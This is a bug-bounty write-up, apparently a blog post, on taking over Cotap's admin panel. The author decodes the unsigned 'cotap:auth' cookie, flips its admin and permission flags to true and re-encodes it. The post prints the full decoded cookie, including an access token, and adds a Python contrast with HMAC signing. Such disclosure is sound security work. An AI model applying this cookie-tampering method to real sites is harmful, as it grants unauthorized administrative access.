
Cotap Admin Panel Takeover

Dipak Kumar Das
Once I was invited to a HackerOne private program. Here is one bug I found in Cotap.

So let's start.
Whenever I get a new target I do a quick subdomain enumeration; for subdomain scanning you can use some great tools like Knock or this online tool.

After the subdomain scan I found the subdomain admin.cotap.com.
Visiting admin.cotap.com redirected me to app.cotap.com, which is the normal user interface, so nothing wrong there.

So now the question was how to get into the admin panel. I tried a lot but failed.

After a few days I was testing it again, this time as a normal user, and when I exported the cookies I found this.
Here are the active user session cookies:
[
{
"domain": ".cotap.com",
"expirationDate": 1504556226,
"hostOnly": false,
"httpOnly": false,
"name": "ga",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "GA1.2.1098904338.1441483504",
"id": 1
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_anonymous_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%227641cefa-af44-46b3-90e5-6b7df324bc86%22",
"id": 2
},
{
"domain": ".cotap.com",
"expirationDate": 1473020144,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_group_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "null",
"id": 3
},
{
"domain": ".cotap.com",
"expirationDate": 1473020194,
"hostOnly": false,
"httpOnly": false,
"name": "ajs_user_id",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%22test%40armyspy.com%22",
"id": 4
},
{
"domain": ".cotap.com",
"expirationDate": 1756844163,
"hostOnly": false,
"httpOnly": false,
"name": "amplitude_idcotap.com",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "eyJkZXZpY2VJZCI6IjA4MWUwNjg0LTlmZWUtNDBmOC04OWZiLWVkZjFkMTI5NjJlZCIsInVzZXJJZCI6bnVsbCwib3B0T3V0IjpmYWxzZX0=",
"id": 5
},
{
"domain": ".cotap.com",
"expirationDate": 2072204226,
"hostOnly": false,
"httpOnly": false,
"name": "cotap:auth",
"path": "/",
"secure": true,
"session": false,
"storeId": "0",
"value": "<cotap:auth value omitted>",
"id": 6
},
{
"domain": "app.cotap.com",
"expirationDate": 1473020194,
"hostOnly": true,
"httpOnly": false,
"name": "mp_7a46f06059cd77ff0cf1576eedb16eb3_mixpanel",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "%7B%22distinct_id%22%3A%20%22test%40armyspy.com%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%2C%22mp_name_tag%22%3A%20%22test%40armyspy.com%22%2C%22id%22%3A%20%22test%40armyspy.com%22%2C%22%24email%22%3A%20%22test%40armyspy.com%22%7D",
"id": 7
},
{
"domain": "app.cotap.com",
"expirationDate": 1911844800,
"hostOnly": true,
"httpOnly": false,
"name": "pnctest",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1",
"id": 8
}
]

The cookie named cotap:auth contains a long value (omitted here).

You can guess that it is Base64.

So here is what I did.

Step 1: Base64-decode it

%7B%22talker%22%3A%7B%22id%22%3A48033392%2C%22address%22%3A%22test%40armyspy.com%22%2C%22personal_address%22%3Atrue%2C%22verified%22%3Atrue%2C%22first_name%22%3A%22hello%22%2C%22last_name%22%3A%22me%22%2C%22avatar_url%22%3Anull%2C%22notification_method%22%3A%22email%22%2C%22username%22%3Anull%2C%22timestamp%22%3A%222015-09-05T03%3A53%3A30.235Z%22%2C%22registered%22%3Atrue%2C%22premium%22%3Afalse%2C%22admin%22%3Afalse%2C%22permissions%22%3A%7B%22disable_conversation_sharing%22%3Afalse%2C%22remove_participants%22%3Afalse%2C%22files%22%3Atrue%2C%22premium_files%22%3Afalse%2C%22rating_reminder%22%3Afalse%2C%22place_video_calls%22%3Afalse%7D%2C%22phone_number%22%3Anull%7D%2C%22address%22%3A%22test%40armyspy.com%22%2C%22scope%22%3A%22web%22%2C%22supported_schemes%22%3A%5B%22code_mode%22%5D%2C%22access_token%22%3A%2283126cce16360467cc9b2e627e8aadf3%22%2C%22state%22%3A%22verified%22%2C%22scheme%22%3A%7B%22type%22%3A%22code_mode%22%2C%22confirm_address%22%3Afalse%2C%22require_profile%22%3Afalse%7D%2C%22code%22%3A%223226%22%2C%22pubnub_channel%22%3A%22e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47%22%7D
Step 2: URL-decode it

{"talker":{"id":48033392,"address":"test@armyspy.com","personal_address":true,"verified":true,"first_name":"hello","last_name":"me","avatar_url":null,"notification_method":"email","username":null,"timestamp":"2015-09-05T03:53:30.235Z","registered":true,"premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false},"phone_number":null},"address":"test@armyspy.com","scope":"web","supported_schemes":["code_mode"],"access_token":"83126cce16360467cc9b2e627e8aadf3","state":"verified","scheme":{"type":"code_mode","confirm_address":false,"require_profile":false},"code":"3226","pubnub_channel":"e926574c0f07e38a5b04c3f218a8a98c638004a07067639770ed4c3a94e29c1ec7df11e8162b75c33ed8597fad6da26e0b1143ed1a9d1e8364bce778692d7f47"}
Step 3: change the false values to true. In the following parameters, change every false to true:
"premium":false,"admin":false,"permissions":{"disable_conversation_sharing":false,"remove_participants":false,"files":true,"premium_files":false,"rating_reminder":false,"place_video_calls":false}

Step 4: After changing false to true, URL-encode and then Base64-encode the result, replace the old value of cotap:auth with the new one, import the cookie into the normal user interface at app.cotap.com, and visit admin.cotap.com.

And finally I was logged in as admin.
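The root cause is that the admin and permissions flags live in a cookie the server reads back without verifying it. As an added example (not Cotap's code; SAMPLE_AUTH, SECRET and the function names are my own assumptions), the Python below models the post's URL-encode/Base64 layering, shows an unsigned check accepting a re-encoded flag, and contrasts it with an HMAC-signed cookie whose tag check rejects the same modification:

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import quote, unquote

# Constructed sample modelled on the decoded cotap:auth JSON shown in the post,
# trimmed to the fields that matter (id and address are the post's own values).
SAMPLE_AUTH = {
    "talker": {"id": 48033392, "address": "test@armyspy.com", "admin": False,
               "premium": False, "permissions": {"files": True, "place_video_calls": False}},
    "scope": "web", "state": "verified",
}
SECRET = b"placeholder-server-side-key"  # hypothetical key; lives only on the server

def encode_cookie(obj):
    """URL-encode the JSON, then Base64 it: the two layers the post peeled off in steps 1-2."""
    return base64.b64encode(quote(json.dumps(obj, separators=(",", ":")), safe="").encode()).decode()

def decode_cookie(value):
    """Reverse of encode_cookie: Base64-decode, URL-decode, parse JSON."""
    return json.loads(unquote(base64.b64decode(value).decode()))

def is_admin_unsigned(cookie):
    """The flawed design: the admin flag is read straight out of client-held data."""
    return decode_cookie(cookie)["talker"]["admin"] is True

def issue_signed_cookie(obj, key=SECRET):
    """Hardened variant: append an HMAC-SHA256 tag computed over the encoded payload."""
    payload = encode_cookie(obj)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"

def is_admin_signed(cookie, key=SECRET):
    """Verify the tag before trusting any field; returns None for a tampered cookie."""
    payload, _, tag = cookie.rpartition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_cookie(payload)["talker"]["admin"] is True

def set_admin_flag(cookie, value):
    """Re-encode the payload with a different admin value (used to exercise both checks)."""
    data = decode_cookie(cookie)
    data["talker"]["admin"] = value
    return encode_cookie(data)
```

Signing only detects tampering; the more robust fix is to keep privilege state server-side and put nothing but an opaque session id in the cookie.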


PoC images:

Thanks

Suggestions and feedback are welcome.

6 comments

  1. Nice one..
    1. Thq bro :)
  2. Nice finding.. How much reward did you get with this bug?
    1. Sorry, it's private.
  3. nice catch (y)